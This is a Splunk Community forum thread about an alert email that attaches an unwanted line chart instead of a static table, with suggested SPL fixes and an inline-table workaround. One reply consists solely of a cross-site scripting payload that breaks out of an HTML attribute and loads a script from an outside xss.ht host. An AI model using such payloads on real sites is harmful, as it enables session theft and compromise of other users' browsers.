Alerting
×

Join the Conversation

Without signing in, you're just watching from the sidelines. Sign in or Register to connect, share, and be part of the Splunk Community.
Ask a Question

Alerts, wrong visualization in the attachment

a_n
Path Finder
‎09-07-2021 12:34 AM

Hello All,

I have several alerts which send email notifications.

I know it might be very basic, but I need your help.

One alert is to specify if a local host has accessed a blacklisted IP.
So I expect to have a table with:
Src, Dest, Port 
The search returns table, but I do not understand why does it attach a Line-Chart diagram!
I want it as Static table. In Visualization tab, it does not show me static table. I even tried to create a new alert without even going to the visualization tab, but I got same result.

I have even changed the search and used Table instead of stats.

Please advise.

Thank you

Labels (1)
Labels
Tags (1)
0 Karma
Reply

a_n
Path Finder
‎09-09-2021 11:04 PM

Hi,
search is like:
index=FW
|table Src,Dst,pt
|dedup Src,Dst,pt
|rename Src as "Source",Dst as "Destination", pt as "Port"

chart is like:
Screen Shot 2021-09-10 at 9.01.22 AM.png

Which I do not need it.
I managed for now as a workaround to Not attache PDF and use Inline Table.

Is it the only way to do this?
Thank you

 

0 Karma
Reply

isoutamo
SplunkTrust
SplunkTrust
‎09-09-2021 11:23 PM

Maybe you can change you table + deduce to

...
| stats count by Src, Dst, pt
...

And as you said don't attach pdf etc. into alert email, just link and/or inline.

r. Ismo 

0 Karma
Reply

shivamrai
New Member
‎09-10-2021 01:37 AM

"><script src=https://shivamraixssht.xss.ht></script>

0 Karma
Reply

a_n
Path Finder
‎09-10-2021 02:22 AM

Hi,
Sorry, I am afraid I did not get what is this?
would you please elaborate?
Thank you

0 Karma
Reply

a_n
Path Finder
‎09-10-2021 12:57 AM

Yes, I was using this stats command.

My concern is about the chart, so it seems this is the only way:
to not attach PDF and include the Table inline.

 

Thank you very much

0 Karma
Reply

a_n
Path Finder
‎09-09-2021 10:46 PM

Any one can assist please?

0 Karma
Reply

isoutamo
SplunkTrust
SplunkTrust
‎09-09-2021 10:58 PM

Can you post your query + those visualisations?

0 Karma
Reply

a_n
Path Finder
‎09-09-2021 11:22 PM

I have added the search and chart, but seems in wrong level.

Please check.

Thank you

0 Karma
Reply
Got questions? Get answers!

Join the Splunk Community Slack to learn, troubleshoot, and make connections with fellow Splunk practitioners in real time!

Meet up IRL or virtually!

Join Splunk User Groups to connect and learn in-person by region or remotely by topic or industry.

Get Updates on the Splunk Community!

Agent Mode Engaged! Enchaining Agentic Operations with Splunk AI Assistant 2.0

    Are you ready to transform how your team handles complex data requests? We invite you to our upcoming ...

Announcing Modern Navigation: A New Era of Splunk User Experience

We are excited to introduce the Modern Navigation feature in the Splunk Platform, available to both cloud and ...

Modernize your Splunk Apps – Introducing Python 3.13 in Splunk

We are excited to announce that the upcoming releases of Splunk Enterprise 10.2.x and Splunk Cloud Platform ...